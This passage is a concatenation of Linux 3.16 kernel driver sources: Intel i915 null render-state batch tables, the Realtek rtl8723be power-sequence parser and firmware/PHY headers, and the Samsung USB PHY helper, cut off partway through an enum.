0x00000340, /* reloc */
0xffffffff,
0x00000000,
0x782a0000,
0x00000360,
0x79000002,
0xffffffff,
0x00000000,
0x00000000,
0x7b000005,
0x0000000f,
0x00000003,
0x00000000,
0x00000001,
0x00000000,
0x00000000,
0x05000000, /* cmds end */
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000031, /* state start */
0x00000003,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0xf99a130c,
0x799a130c,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000492,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x0080005a,
0x2e2077bd,
0x000000c0,
0x008d0040,
0x0080005a,
0x2e6077bd,
0x000000d0,
0x008d0040,
0x02800031,
0x21801fa9,
0x008d0e20,
0x08840001,
0x00800001,
0x2e2003bd,
0x008d0180,
0x00000000,
0x00800001,
0x2e6003bd,
0x008d01c0,
0x00000000,
0x00800001,
0x2ea003bd,
0x008d0200,
0x00000000,
0x00800001,
0x2ee003bd,
0x008d0240,
0x00000000,
0x05800031,
0x20001fa8,
0x008d0e20,
0x90031000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000380,
0x000003a0,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000, /* state end */
};
RO_RENDERSTATE(7);
<|start_filename|>linux-3.16/drivers/gpu/drm/i915/intel_renderstate_gen8.c<|end_filename|>
#include "intel_renderstate.h"
static const u32 gen8_null_state_relocs[] = {
0x00000048,
0x00000050,
0x00000060,
0x000003ec,
};
static const u32 gen8_null_state_batch[] = {
0x69040000,
0x61020001,
0x00000000,
0x00000000,
0x79120000,
0x00000000,
0x79130000,
0x00000000,
0x79140000,
0x00000000,
0x79150000,
0x00000000,
0x79160000,
0x00000000,
0x6101000e,
0x00000001,
0x00000000,
0x00000001,
0x00000001, /* reloc */
0x00000000,
0x00000001, /* reloc */
0x00000000,
0x00000000,
0x00000000,
0x00000001, /* reloc */
0x00000000,
0xfffff001,
0x00001001,
0xfffff001,
0x00001001,
0x78230000,
0x000006e0,
0x78210000,
0x00000700,
0x78300000,
0x08010040,
0x78330000,
0x08000000,
0x78310000,
0x08000000,
0x78320000,
0x08000000,
0x78240000,
0x00000641,
0x780e0000,
0x00000601,
0x780d0000,
0x00000000,
0x78180000,
0x00000001,
0x78520003,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78190009,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x781b0007,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78270000,
0x00000000,
0x782c0000,
0x00000000,
0x781c0002,
0x00000000,
0x00000000,
0x00000000,
0x78160009,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78110008,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78290000,
0x00000000,
0x782e0000,
0x00000000,
0x781a0009,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x781d0007,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78280000,
0x00000000,
0x782d0000,
0x00000000,
0x78260000,
0x00000000,
0x782b0000,
0x00000000,
0x78150009,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78100007,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x781e0003,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78120002,
0x00000000,
0x00000000,
0x00000000,
0x781f0002,
0x30400820,
0x00000000,
0x00000000,
0x78510009,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78500003,
0x00210000,
0x00000000,
0x00000000,
0x00000000,
0x78130002,
0x00000000,
0x00000000,
0x00000000,
0x782a0000,
0x00000480,
0x782f0000,
0x00000540,
0x78140000,
0x00000800,
0x78170009,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x7820000a,
0x00000580,
0x00000000,
0x08080000,
0x00000000,
0x00000000,
0x1f000002,
0x00060000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x784d0000,
0x40000000,
0x784f0000,
0x80000100,
0x780f0000,
0x00000740,
0x78050006,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78070003,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78060003,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78040001,
0x00000000,
0x00000001,
0x79000002,
0xffffffff,
0x00000000,
0x00000000,
0x78080003,
0x00006000,
0x000005e0, /* reloc */
0x00000000,
0x00000000,
0x78090005,
0x02000000,
0x22220000,
0x02f60000,
0x11230000,
0x02850004,
0x11230000,
0x784b0000,
0x0000000f,
0x78490001,
0x00000000,
0x00000000,
0x7b000005,
0x00000000,
0x00000003,
0x00000000,
0x00000001,
0x00000000,
0x00000000,
0x05000000, /* cmds end */
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x000004c0, /* state start */
0x00000500,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000092,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x0060005a,
0x21403ae8,
0x3a0000c0,
0x008d0040,
0x0060005a,
0x21603ae8,
0x3a0000c0,
0x008d0080,
0x0060005a,
0x21803ae8,
0x3a0000d0,
0x008d0040,
0x0060005a,
0x21a03ae8,
0x3a0000d0,
0x008d0080,
0x02800031,
0x2e0022e8,
0x0e000140,
0x08840001,
0x05800031,
0x200022e0,
0x0e000e00,
0x90031000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x06200000,
0x00000002,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0xf99a130c,
0x799a130c,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x3f800000,
0x00000000,
0x3f800000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000, /* state end */
};
RO_RENDERSTATE(8);
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723be/pwrseqcmd.c<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2014 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#include "pwrseq.h"
/* Description:
* This routine deal with the Power Configuration CMDs
* parsing for RTL8723/RTL8188E Series IC.
* Assumption:
* We should follow specific format which was released from HW SD.
*
* 2011.07.07, added by Roger.
*/
bool rtlbe_hal_pwrseqcmdparsing(struct rtl_priv *rtlpriv, u8 cut_version,
u8 fab_version, u8 interface_type,
struct wlan_pwr_cfg pwrcfgcmd[])
{
struct wlan_pwr_cfg pwr_cfg_cmd = {0};
bool b_polling_bit = false;
u32 ary_idx = 0;
u8 value = 0;
u32 offset = 0;
u32 polling_count = 0;
u32 max_polling_cnt = 5000;
do {
pwr_cfg_cmd = pwrcfgcmd[ary_idx];
RT_TRACE(rtlpriv, COMP_INIT, DBG_TRACE,
"rtlbe_hal_pwrseqcmdparsing(): "
"offset(%#x),cut_msk(%#x), fab_msk(%#x),"
"interface_msk(%#x), base(%#x), "
"cmd(%#x), msk(%#x), value(%#x)\n",
GET_PWR_CFG_OFFSET(pwr_cfg_cmd),
GET_PWR_CFG_CUT_MASK(pwr_cfg_cmd),
GET_PWR_CFG_FAB_MASK(pwr_cfg_cmd),
GET_PWR_CFG_INTF_MASK(pwr_cfg_cmd),
GET_PWR_CFG_BASE(pwr_cfg_cmd),
GET_PWR_CFG_CMD(pwr_cfg_cmd),
GET_PWR_CFG_MASK(pwr_cfg_cmd),
GET_PWR_CFG_VALUE(pwr_cfg_cmd));
if ((GET_PWR_CFG_FAB_MASK(pwr_cfg_cmd)&fab_version) &&
(GET_PWR_CFG_CUT_MASK(pwr_cfg_cmd)&cut_version) &&
(GET_PWR_CFG_INTF_MASK(pwr_cfg_cmd)&interface_type)) {
switch (GET_PWR_CFG_CMD(pwr_cfg_cmd)) {
case PWR_CMD_READ:
RT_TRACE(rtlpriv, COMP_INIT, DBG_TRACE,
"rtlbe_hal_pwrseqcmdparsing(): "
"PWR_CMD_READ\n");
break;
case PWR_CMD_WRITE:
RT_TRACE(rtlpriv, COMP_INIT, DBG_TRACE,
"rtlbe_hal_pwrseqcmdparsing(): "
"PWR_CMD_WRITE\n");
offset = GET_PWR_CFG_OFFSET(pwr_cfg_cmd);
/*Read the value from system register*/
value = rtl_read_byte(rtlpriv, offset);
value &= (~(GET_PWR_CFG_MASK(pwr_cfg_cmd)));
value = value | (GET_PWR_CFG_VALUE(pwr_cfg_cmd)
& GET_PWR_CFG_MASK(pwr_cfg_cmd));
/*Write the value back to sytem register*/
rtl_write_byte(rtlpriv, offset, value);
break;
case PWR_CMD_POLLING:
RT_TRACE(rtlpriv, COMP_INIT, DBG_TRACE,
"rtlbe_hal_pwrseqcmdparsing(): "
"PWR_CMD_POLLING\n");
b_polling_bit = false;
offset = GET_PWR_CFG_OFFSET(pwr_cfg_cmd);
do {
value = rtl_read_byte(rtlpriv, offset);
value &= GET_PWR_CFG_MASK(pwr_cfg_cmd);
if (value ==
(GET_PWR_CFG_VALUE(pwr_cfg_cmd) &
GET_PWR_CFG_MASK(pwr_cfg_cmd)))
b_polling_bit = true;
else
udelay(10);
if (polling_count++ > max_polling_cnt)
return false;
} while (!b_polling_bit);
break;
case PWR_CMD_DELAY:
RT_TRACE(rtlpriv, COMP_INIT, DBG_TRACE,
"rtlbe_hal_pwrseqcmdparsing(): "
"PWR_CMD_DELAY\n");
if (GET_PWR_CFG_VALUE(pwr_cfg_cmd) ==
PWRSEQ_DELAY_US)
udelay(GET_PWR_CFG_OFFSET(pwr_cfg_cmd));
else
mdelay(GET_PWR_CFG_OFFSET(pwr_cfg_cmd));
break;
case PWR_CMD_END:
RT_TRACE(rtlpriv, COMP_INIT, DBG_TRACE,
"rtlbe_hal_pwrseqcmdparsing(): "
"PWR_CMD_END\n");
return true;
break;
default:
RT_ASSERT(false,
"rtlbe_hal_pwrseqcmdparsing(): "
"Unknown CMD!!\n");
break;
}
}
ary_idx++;
} while (1);
return true;
}
<|start_filename|>linux-3.16/drivers/usb/phy/phy-samsung-usb.c<|end_filename|>
/* linux/drivers/usb/phy/phy-samsung-usb.c
*
* Copyright (c) 2012 Samsung Electronics Co., Ltd.
* http://www.samsung.com
*
* Author: <NAME> <<EMAIL>>
*
* Samsung USB-PHY helper driver with common function calls;
* interacts with Samsung USB 2.0 PHY controller driver and later
* with Samsung USB 3.0 PHY driver.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
#include <linux/module.h>
#include <linux/platform_device.h>
#include <linux/clk.h>
#include <linux/device.h>
#include <linux/err.h>
#include <linux/io.h>
#include <linux/of.h>
#include <linux/of_address.h>
#include <linux/usb/samsung_usb_phy.h>
#include "phy-samsung-usb.h"
int samsung_usbphy_parse_dt(struct samsung_usbphy *sphy)
{
struct device_node *usbphy_sys;
/* Getting node for system controller interface for usb-phy */
usbphy_sys = of_get_child_by_name(sphy->dev->of_node, "usbphy-sys");
if (!usbphy_sys) {
dev_err(sphy->dev, "No sys-controller interface for usb-phy\n");
return -ENODEV;
}
sphy->pmuregs = of_iomap(usbphy_sys, 0);
if (sphy->pmuregs == NULL) {
dev_err(sphy->dev, "Can't get usb-phy pmu control register\n");
goto err0;
}
sphy->sysreg = of_iomap(usbphy_sys, 1);
/*
* Not returning error code here, since this situation is not fatal.
* Few SoCs may not have this switch available
*/
if (sphy->sysreg == NULL)
dev_warn(sphy->dev, "Can't get usb-phy sysreg cfg register\n");
of_node_put(usbphy_sys);
return 0;
err0:
of_node_put(usbphy_sys);
return -ENXIO;
}
EXPORT_SYMBOL_GPL(samsung_usbphy_parse_dt);
/*
* Set isolation here for phy.
* Here 'on = true' would mean USB PHY block is isolated, hence
* de-activated and vice-versa.
*/
void samsung_usbphy_set_isolation_4210(struct samsung_usbphy *sphy, bool on)
{
void __iomem *reg = NULL;
u32 reg_val;
u32 en_mask = 0;
if (!sphy->pmuregs) {
dev_warn(sphy->dev, "Can't set pmu isolation\n");
return;
}
if (sphy->phy_type == USB_PHY_TYPE_DEVICE) {
reg = sphy->pmuregs + sphy->drv_data->devphy_reg_offset;
en_mask = sphy->drv_data->devphy_en_mask;
} else if (sphy->phy_type == USB_PHY_TYPE_HOST) {
reg = sphy->pmuregs + sphy->drv_data->hostphy_reg_offset;
en_mask = sphy->drv_data->hostphy_en_mask;
}
reg_val = readl(reg);
if (on)
reg_val &= ~en_mask;
else
reg_val |= en_mask;
writel(reg_val, reg);
if (sphy->drv_data->cpu_type == TYPE_EXYNOS4X12) {
writel(reg_val, sphy->pmuregs + EXYNOS4X12_PHY_HSIC_CTRL0);
writel(reg_val, sphy->pmuregs + EXYNOS4X12_PHY_HSIC_CTRL1);
}
}
EXPORT_SYMBOL_GPL(samsung_usbphy_set_isolation_4210);
/*
* Configure the mode of working of usb-phy here: HOST/DEVICE.
*/
void samsung_usbphy_cfg_sel(struct samsung_usbphy *sphy)
{
u32 reg;
if (!sphy->sysreg) {
dev_warn(sphy->dev, "Can't configure specified phy mode\n");
return;
}
reg = readl(sphy->sysreg);
if (sphy->phy_type == USB_PHY_TYPE_DEVICE)
reg &= ~EXYNOS_USB20PHY_CFG_HOST_LINK;
else if (sphy->phy_type == USB_PHY_TYPE_HOST)
reg |= EXYNOS_USB20PHY_CFG_HOST_LINK;
writel(reg, sphy->sysreg);
}
EXPORT_SYMBOL_GPL(samsung_usbphy_cfg_sel);
/*
* PHYs are different for USB Device and USB Host.
* This make sure that correct PHY type is selected before
* any operation on PHY.
*/
int samsung_usbphy_set_type(struct usb_phy *phy,
enum samsung_usb_phy_type phy_type)
{
struct samsung_usbphy *sphy = phy_to_sphy(phy);
sphy->phy_type = phy_type;
return 0;
}
EXPORT_SYMBOL_GPL(samsung_usbphy_set_type);
int samsung_usbphy_rate_to_clksel_64xx(struct samsung_usbphy *sphy,
unsigned long rate)
{
unsigned int clksel;
switch (rate) {
case 12 * MHZ:
clksel = PHYCLK_CLKSEL_12M;
break;
case 24 * MHZ:
clksel = PHYCLK_CLKSEL_24M;
break;
case 48 * MHZ:
clksel = PHYCLK_CLKSEL_48M;
break;
default:
dev_err(sphy->dev,
"Invalid reference clock frequency: %lu\n", rate);
return -EINVAL;
}
return clksel;
}
EXPORT_SYMBOL_GPL(samsung_usbphy_rate_to_clksel_64xx);
int samsung_usbphy_rate_to_clksel_4x12(struct samsung_usbphy *sphy,
unsigned long rate)
{
unsigned int clksel;
switch (rate) {
case 9600 * KHZ:
clksel = FSEL_CLKSEL_9600K;
break;
case 10 * MHZ:
clksel = FSEL_CLKSEL_10M;
break;
case 12 * MHZ:
clksel = FSEL_CLKSEL_12M;
break;
case 19200 * KHZ:
clksel = FSEL_CLKSEL_19200K;
break;
case 20 * MHZ:
clksel = FSEL_CLKSEL_20M;
break;
case 24 * MHZ:
clksel = FSEL_CLKSEL_24M;
break;
case 50 * MHZ:
clksel = FSEL_CLKSEL_50M;
break;
default:
dev_err(sphy->dev,
"Invalid reference clock frequency: %lu\n", rate);
return -EINVAL;
}
return clksel;
}
EXPORT_SYMBOL_GPL(samsung_usbphy_rate_to_clksel_4x12);
/*
* Returns reference clock frequency selection value
*/
int samsung_usbphy_get_refclk_freq(struct samsung_usbphy *sphy)
{
struct clk *ref_clk;
unsigned long rate;
int refclk_freq;
/*
* In exynos5250 USB host and device PHY use
* external crystal clock XXTI
*/
if (sphy->drv_data->cpu_type == TYPE_EXYNOS5250)
ref_clk = clk_get(sphy->dev, "ext_xtal");
else
ref_clk = clk_get(sphy->dev, "xusbxti");
if (IS_ERR(ref_clk)) {
dev_err(sphy->dev, "Failed to get reference clock\n");
return PTR_ERR(ref_clk);
}
rate = clk_get_rate(ref_clk);
refclk_freq = sphy->drv_data->rate_to_clksel(sphy, rate);
clk_put(ref_clk);
return refclk_freq;
}
EXPORT_SYMBOL_GPL(samsung_usbphy_get_refclk_freq);
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723com/dm_common.c<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2014 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#include "../wifi.h"
#include "dm_common.h"
#include "../rtl8723ae/dm.h"
#include <linux/module.h>
/* These routines are common to RTL8723AE and RTL8723bE */
void rtl8723_dm_init_dynamic_txpower(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
rtlpriv->dm.dynamic_txpower_enable = false;
rtlpriv->dm.last_dtp_lvl = TXHIGHPWRLEVEL_NORMAL;
rtlpriv->dm.dynamic_txhighpower_lvl = TXHIGHPWRLEVEL_NORMAL;
}
EXPORT_SYMBOL_GPL(rtl8723_dm_init_dynamic_txpower);
void rtl8723_dm_init_edca_turbo(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
rtlpriv->dm.current_turbo_edca = false;
rtlpriv->dm.is_any_nonbepkts = false;
rtlpriv->dm.is_cur_rdlstate = false;
}
EXPORT_SYMBOL_GPL(rtl8723_dm_init_edca_turbo);
void rtl8723_dm_init_dynamic_bb_powersaving(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
rtlpriv->dm_pstable.pre_ccastate = CCA_MAX;
rtlpriv->dm_pstable.cur_ccasate = CCA_MAX;
rtlpriv->dm_pstable.pre_rfstate = RF_MAX;
rtlpriv->dm_pstable.cur_rfstate = RF_MAX;
rtlpriv->dm_pstable.rssi_val_min = 0;
rtlpriv->dm_pstable.initialize = 0;
}
EXPORT_SYMBOL_GPL(rtl8723_dm_init_dynamic_bb_powersaving);
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723com/fw_common.h<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2014 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#ifndef __FW_COMMON_H__
#define __FW_COMMON_H__
#define REG_SYS_FUNC_EN 0x0002
#define REG_MCUFWDL 0x0080
#define FW_8192C_START_ADDRESS 0x1000
#define FW_8192C_PAGE_SIZE 4096
#define FW_8192C_POLLING_TIMEOUT_COUNT 6000
#define FW_8192C_POLLING_DELAY 5
#define MCUFWDL_RDY BIT(1)
#define FWDL_CHKSUM_RPT BIT(2)
#define WINTINI_RDY BIT(6)
#define REG_RSV_CTRL 0x001C
#define REG_HMETFR 0x01CC
enum version_8723e {
VERSION_TEST_UMC_CHIP_8723 = 0x0081,
VERSION_NORMAL_UMC_CHIP_8723_1T1R_A_CUT = 0x0089,
VERSION_NORMAL_UMC_CHIP_8723_1T1R_B_CUT = 0x1089,
VERSION_TEST_CHIP_1T1R_8723B = 0x0106,
VERSION_NORMAL_SMIC_CHIP_1T1R_8723B = 0x010E,
VERSION_UNKNOWN = 0xFF,
};
enum rtl8723ae_h2c_cmd {
H2C_AP_OFFLOAD = 0,
H2C_SETPWRMODE = 1,
H2C_JOINBSSRPT = 2,
H2C_RSVDPAGE = 3,
H2C_RSSI_REPORT = 4,
H2C_P2P_PS_CTW_CMD = 5,
H2C_P2P_PS_OFFLOAD = 6,
H2C_RA_MASK = 7,
MAX_H2CCMD
};
enum rtl8723be_cmd {
H2C_8723BE_RSVDPAGE = 0,
H2C_8723BE_JOINBSSRPT = 1,
H2C_8723BE_SCAN = 2,
H2C_8723BE_KEEP_ALIVE_CTRL = 3,
H2C_8723BE_DISCONNECT_DECISION = 4,
H2C_8723BE_INIT_OFFLOAD = 6,
H2C_8723BE_AP_OFFLOAD = 8,
H2C_8723BE_BCN_RSVDPAGE = 9,
H2C_8723BE_PROBERSP_RSVDPAGE = 10,
H2C_8723BE_SETPWRMODE = 0x20,
H2C_8723BE_PS_TUNING_PARA = 0x21,
H2C_8723BE_PS_TUNING_PARA2 = 0x22,
H2C_8723BE_PS_LPS_PARA = 0x23,
H2C_8723BE_P2P_PS_OFFLOAD = 0x24,
H2C_8723BE_WO_WLAN = 0x80,
H2C_8723BE_REMOTE_WAKE_CTRL = 0x81,
H2C_8723BE_AOAC_GLOBAL_INFO = 0x82,
H2C_8723BE_AOAC_RSVDPAGE = 0x83,
H2C_8723BE_RSSI_REPORT = 0x42,
H2C_8723BE_RA_MASK = 0x40,
H2C_8723BE_SELECTIVE_SUSPEND_ROF_CMD,
H2C_8723BE_P2P_PS_MODE,
H2C_8723BE_PSD_RESULT,
/*Not defined CTW CMD for P2P yet*/
H2C_8723BE_P2P_PS_CTW_CMD,
MAX_8723BE_H2CCMD
};
struct rtl92c_firmware_header {
u16 signature;
u8 category;
u8 function;
u16 version;
u8 subversion;
u8 rsvd1;
u8 month;
u8 date;
u8 hour;
u8 minute;
u16 ramcodesize;
u16 rsvd2;
u32 svnindex;
u32 rsvd3;
u32 rsvd4;
u32 rsvd5;
};
void rtl8723ae_firmware_selfreset(struct ieee80211_hw *hw);
void rtl8723be_firmware_selfreset(struct ieee80211_hw *hw);
void rtl8723_enable_fw_download(struct ieee80211_hw *hw, bool enable);
void rtl8723_fw_block_write(struct ieee80211_hw *hw,
const u8 *buffer, u32 size);
void rtl8723_fw_page_write(struct ieee80211_hw *hw,
u32 page, const u8 *buffer, u32 size);
void rtl8723_write_fw(struct ieee80211_hw *hw,
enum version_8723e version,
u8 *buffer, u32 size);
int rtl8723_fw_free_to_go(struct ieee80211_hw *hw, bool is_8723be);
int rtl8723_download_fw(struct ieee80211_hw *hw, bool is_8723be);
#endif
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723be/phy.h<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2014 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#ifndef __RTL8723BE_PHY_H__
#define __RTL8723BE_PHY_H__
/*It must always set to 4, otherwise read efuse table secquence will be wrong.*/
#define MAX_TX_COUNT 4
#define TX_1S 0
#define TX_2S 1
#define MAX_POWER_INDEX 0x3F
#define MAX_PRECMD_CNT 16
#define MAX_RFDEPENDCMD_CNT 16
#define MAX_POSTCMD_CNT 16
#define MAX_DOZE_WAITING_TIMES_9x 64
#define RT_CANNOT_IO(hw) false
#define HIGHPOWER_RADIOA_ARRAYLEN 22
#define IQK_ADDA_REG_NUM 16
#define IQK_BB_REG_NUM 9
#define MAX_TOLERANCE 5
#define IQK_DELAY_TIME 10
#define index_mapping_NUM 15
#define APK_BB_REG_NUM 5
#define APK_AFE_REG_NUM 16
#define APK_CURVE_REG_NUM 4
#define PATH_NUM 1
#define LOOP_LIMIT 5
#define MAX_STALL_TIME 50
#define ANTENNADIVERSITYVALUE 0x80
#define MAX_TXPWR_IDX_NMODE_92S 63
#define RESET_CNT_LIMIT 3
#define IQK_ADDA_REG_NUM 16
#define IQK_MAC_REG_NUM 4
#define RF6052_MAX_PATH 2
#define CT_OFFSET_MAC_ADDR 0X16
#define CT_OFFSET_CCK_TX_PWR_IDX 0x5A
#define CT_OFFSET_HT401S_TX_PWR_IDX 0x60
#define CT_OFFSET_HT402S_TX_PWR_IDX_DIFF 0x66
#define CT_OFFSET_HT20_TX_PWR_IDX_DIFF 0x69
#define CT_OFFSET_OFDM_TX_PWR_IDX_DIFF 0x6C
#define CT_OFFSET_HT40_MAX_PWR_OFFSET 0x6F
#define CT_OFFSET_HT20_MAX_PWR_OFFSET 0x72
#define CT_OFFSET_CHANNEL_PLAH 0x75
#define CT_OFFSET_THERMAL_METER 0x78
#define CT_OFFSET_RF_OPTION 0x79
#define CT_OFFSET_VERSION 0x7E
#define CT_OFFSET_CUSTOMER_ID 0x7F
#define RTL92C_MAX_PATH_NUM 2
enum hw90_block_e {
HW90_BLOCK_MAC = 0,
HW90_BLOCK_PHY0 = 1,
HW90_BLOCK_PHY1 = 2,
HW90_BLOCK_RF = 3,
HW90_BLOCK_MAXIMUM = 4,
};
enum baseband_config_type {
BASEBAND_CONFIG_PHY_REG = 0,
BASEBAND_CONFIG_AGC_TAB = 1,
};
enum ra_offset_area {
RA_OFFSET_LEGACY_OFDM1,
RA_OFFSET_LEGACY_OFDM2,
RA_OFFSET_HT_OFDM1,
RA_OFFSET_HT_OFDM2,
RA_OFFSET_HT_OFDM3,
RA_OFFSET_HT_OFDM4,
RA_OFFSET_HT_CCK,
};
enum antenna_path {
ANTENNA_NONE,
ANTENNA_D,
ANTENNA_C,
ANTENNA_CD,
ANTENNA_B,
ANTENNA_BD,
ANTENNA_BC,
ANTENNA_BCD,
ANTENNA_A,
ANTENNA_AD,
ANTENNA_AC,
ANTENNA_ACD,
